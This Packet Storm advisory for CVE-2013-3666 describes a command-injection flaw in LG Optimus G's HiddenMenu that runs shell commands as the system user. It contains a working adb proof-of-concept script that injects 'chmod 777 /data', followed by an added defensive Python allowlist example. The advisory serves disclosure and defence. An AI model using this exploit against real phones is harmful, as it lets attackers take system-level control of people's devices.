LG Optimus G Command Injection

Published: 26 May 2013 00:00:00
Reported by: Justin Case
Type: packetstorm
Source: packetstormsecurity.com

LG Optimus G Command Injection vulnerability in HiddenMen

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| CVE | CVE-2013-3666 | 29 May 2013 10:00 | cve |
| Cvelist | CVE-2013-3666 | 29 May 2013 10:00 | cvelist |
| EUVD | EUVD-2013-3599 | 7 Oct 2025 00:30 | euvd |
| NVD | CVE-2013-3666 | 29 May 2013 14:29 | nvd |
| Prion | Command injection | 29 May 2013 14:29 | prion |
| RedhatCVE | CVE-2013-3666 | 22 May 2025 11:30 | redhatcve |

`Device: LG Optimus G E973 (Others affected)  
Firmware: Android 4.1.2 JZO54k (Others affected)  
Evidence: http://youtu.be/ZfbDIpTY-t4  
  
A vulnerability in LG's "HiddenMenu" allows you to execute shell commands  
as the system, with a large array of additional permissions (Groups). This  
vulnerability opens up the device to further attacks. Due to the large  
number of models sharing similar firmware, I have no idea how many devices  
are affected.  
  
  
Details:  
  
Dial: 3845#*XXX# ( XXX to be replaced with model number, in this case  
3845#*973#)  
  
HiddenMenu will open, select WLAN Test, then select Wi-Fi Ping Test/User  
Command, then select User Command.  
  
Replace the tcpdump command with the command you wish to run as system  
user  
  
Then press cancel (not ok). The application will execute the command as  
system user.  
  
  
Automated version (chmod 777 /data):  
#!/bin/bash  
adb shell ls -l /data  
adb shell input tap 45 1200  
adb shell input tap 700 500  
adb shell input tap 350 800  
adb shell input tap 35 700  
adb shell input tap 350 700  
adb shell input tap 700 1000  
adb shell input tap 35 1000  
adb shell input tap 700 800  
adb shell input tap 35 800  
adb shell input tap 700 500  
adb shell input tap 700 1000  
adb shell input tap 700 900  
adb shell input tap 700 900  
adb shell input tap 700 300  
max=46  
count=1  
while [[ $count -le $max ]]  
do  
adb shell input keyevent 67  
((count++))  
done  
adb shell input text chmod  
adb shell input keyevent 62  
adb shell input text 777  
adb shell input keyevent 62  
adb shell input text "/data"  
adb shell input tap 600 600  
adb shell ls -l /data  
  
  
Additional permissions granted to vulnerable application:  
"android.permission.REBOOT"  
"android.permission.WRITE_EXTERNAL_STORAGE"  
"android.permission.BLUETOOTH"  
"android.permission.BLUETOOTH_ADMIN"  
"android.permission.DEVICE_POWER"  
"android.permission.WRITE_SETTINGS"  
"android.permission.READ_SETTINGS"  
"android.permission.READ_CONTACTS"  
"android.permission.WRITE_CONTACTS"  
"android.permission.HARDWARE_TEST"  
"android.permission.VIBRATE"  
"android.permission.WRITE_APN_SETTINGS"  
"android.permission.ACCESS_WIFI_STATE"  
"android.permission.CHANGE_WIFI_STATE"  
"android.permission.FLASHLIGHT"  
"android.permission.READ_ERS"  
"android.permission.WRITE_ERS"  
"android.permission.MASTER_CLEAR"  
"android.permission.MODIFY_AUDIO_SETTINGS"  
"android.permission.ACCESS_COARSE_LOCATION"  
"android.permission.ACCESS_FINE_LOCATION"  
"android.permission.ACCESS_LOCATION_EXTRA_COMMANDS"  
"android.permission.INTERNET"  
"android.permission.BLUETOOTH"  
"android.permission.BLUETOOTH_ADMIN"  
"com.lge.permission.LGSystemDB_READ"  
"com.lge.permission.LGSystemDB_WRITE"  
"android.permission.MOUNT_UNMOUNT_FILESYSTEMS"  
"android.permission.ACCESS_LGDRM"  
"android.permission.DISABLE_KEYGUARD"  
"android.permission.CAMERA"  
"android.permission.WAKE_LOCK"  
"android.permission.WRITE_SETTINGS"  
"android.permission.VIBRATE"  
"android.permission.ACCESS_FINE_LOCATION"  
"android.permission.WRITE_EXTERNAL_STORAGE"  
"android.permission.CAMERA"  
"android.permission.RECORD_AUDIO"  
"android.permission.DISABLE_KEYGUARD"  
"android.permission.MODIFY_AUDIO_SETTINGS"  
"android.permission.WRITE_SETTINGS"  
"android.permission.WAKE_LOCK"  
"android.permission.SET_TIME"  
"com.android.providers.syncml.permission.READ_SYNCML_PROFILE"  
"com.android.providers.syncml.permission.WRITE_SYNCML_PROFILE"  
"com.lge.permission.FACTORY"  
"com.lge.permission.ACCESS_LGFOTA"  
"android.permission.ACCESS_CACHE_FILESYSTEM"  
"com.lge.permission.WV_PROVISION"  
"com.lge.permission.PR_PROVISION"  
"android.permission.READ_EXTERNAL_STORAGE"  
"android.permission.CHANGE_NETWORK_STATE"  
"com.lge.permission.LGHIDDEN"  
`
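
The root cause described in the advisory is a diagnostic field, pre-filled with a tcpdump command, whose edited text is executed with system privileges. The following is an added example, not code from the advisory or from LG (the HiddenMenu source is not shown on this page): one way to constrain such a field, assuming the screen only ever needs tcpdump with a few options. `build_argv`, `RejectedCommand` and the flag allowlist are hypothetical names and choices.

```python
import re
import shlex

# Pattern to avoid: a privileged process handing the raw field text to a shell,
# e.g. subprocess.run(field_text, shell=True).

ALLOWED_BINARY = "tcpdump"  # assumption: the only program this screen needs
FLAGS_NO_ARG = {"-n", "-e", "-v"}
# Flags that take one value, each with a strict pattern for that value.
# -w (write a file) and -z (run a post-rotate command) are deliberately absent:
# fixing the binary alone is not enough when its own options can write or execute.
FLAGS_WITH_ARG = {
    "-i": re.compile(r"[A-Za-z0-9_.]{1,15}"),  # interface name
    "-c": re.compile(r"[0-9]{1,6}"),           # packet count
    "-s": re.compile(r"[0-9]{1,5}"),           # snapshot length
}


class RejectedCommand(ValueError):
    """Raised when the field text is not an allowlisted tcpdump invocation."""


def build_argv(field_text):
    """Return an argv list for an exec-style call (no shell), or raise."""
    try:
        tokens = shlex.split(field_text)
    except ValueError as exc:  # e.g. unbalanced quotes
        raise RejectedCommand(str(exc))
    if not tokens or tokens[0] != ALLOWED_BINARY:
        raise RejectedCommand("only tcpdump may be started from this screen")
    argv = [ALLOWED_BINARY]
    i = 1
    while i < len(tokens):
        flag = tokens[i]
        if flag in FLAGS_NO_ARG:
            argv.append(flag)
            i += 1
        elif (flag in FLAGS_WITH_ARG and i + 1 < len(tokens)
              and FLAGS_WITH_ARG[flag].fullmatch(tokens[i + 1])):
            argv += [flag, tokens[i + 1]]
            i += 2
        else:
            # Unknown flag, missing value, or value with shell metacharacters.
            raise RejectedCommand("option not allowed: %r" % flag)
    return argv
```

The returned list is meant for an exec-style API that takes an argument vector, run from a process holding only the privileges packet capture requires rather than the system user with the permission set listed above.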
